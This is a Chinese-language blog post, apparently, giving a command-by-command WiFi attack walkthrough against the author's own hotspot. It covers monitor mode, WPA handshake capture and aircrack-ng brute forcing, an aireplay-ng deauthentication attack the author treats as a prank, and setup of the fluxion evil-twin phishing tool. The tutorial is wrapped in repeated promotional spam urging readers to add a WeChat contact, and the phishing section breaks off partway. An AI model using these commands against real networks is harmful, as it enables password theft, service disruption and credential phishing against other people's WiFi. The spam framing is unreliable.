先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
正文
3靶标wifi:121(我手机热点)
kali自带工具密码爆破
打开kali虚拟机,插入网卡,选择连接到虚拟机
然后右上角网络多出来了avaliable network可以选择wifi,ifconfig多出来一个wlan0,如图:
airmon-ng check kill 结束所有进程(要不然进行wifi扫描时会出不来结果)
airmon-ng start wlan0 开启网卡驱动(开启监听后wlan0会变成wlan0mon,ps:这个命令执行完就会断网)
ifconfig再次查看
airodump-ng wlan0mon 扫描所有wifi
121是我们目标他的bssid是22:26:66:18:CB:E0
airodump-ng wlan0mon -c 1 --bssid 22:26:66:18:CB:E0 -w ~/wlan0mon 抓取bssid为22:26:66:18:CB:E0的握手包存储在根目录下(我发现直接用airodump的时候需要在监听抓取握手包时有一个用户主动进行握手,也就是尝试连接wifi的行为,才能抓取到可用爆破的握手包,后面用fluxion的就不用主动连接,他会自己把正在连接的用户的握手包给保存下来,但是这不科学,据我所知wifi连接在四次握手之后,在验证成功后就不会有握手行为了,我猜测fluxion他会有短暂的短连wifi重新握手的过程)
出现这个EAPOL标志基本上就可以ctrl+c退出了,然后抓到的cap文件在根目录下
aircrack-ng wlan0mon-04.cap -w password.txt 爆破出来(password.txt为我自拟的wifi弱口令如:888888)
还有个好玩的就是让连接wifi的人断连嘿嘿
aireplay-ng -0 50 -a 22:26:66:18:CB:E0 -c B0:3C:DC:B9:06:FE wlan0mon 第一个-a是wifi的bssid,第二个-c是抓包时第二行的station,可以理解为用户id。然后我就断网了哈哈哈哈,好好玩!!!
配置wifi钓鱼工具fluxion
git clone https://gitee.com/youzicha123/fluxion.git
进入fluxion目录内
./fluxion.sh -i 然后首次打开需要下载依赖包,推荐中科大和清华的源,这样依赖包就都可以下载好(我是先用的中科大的源然后还剩xterm和pykit俩包是missing的,然后改用清华的源就ok了)
安装好了会让选择语言,选择中文,然后开始抓握手包
根据网卡选择扫描频率
左上角出现目标wifi后,点左上角的弹出来的命令行串口crtl+c,选择目标(如果不点一下弹窗,crtl+c就会退出fulxion工具哈哈哈哈)
然后就开始抓包,fluxion牛的地方就和之前说的一样,抓包的时候不需要主动的去触发握手过程就能抓到握手包
如果成功抓到可用的握手包左上角和右下角的窗口就会消失,只剩左下角的内容会更新为攻击完成
这个时候fluxion/attacks/Handshake Snooper/handshakes/路径下就有抓好的握手包,如果要爆破和之前一样用aircrack就可以
接下来进行钓鱼
然后就开始钓鱼伪造一个新的同名wifi,让连接者断开原有wifi连接,这个时候会出现6个窗口
学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
。**
需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-NnVy0Ivp-1713594998846)]
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!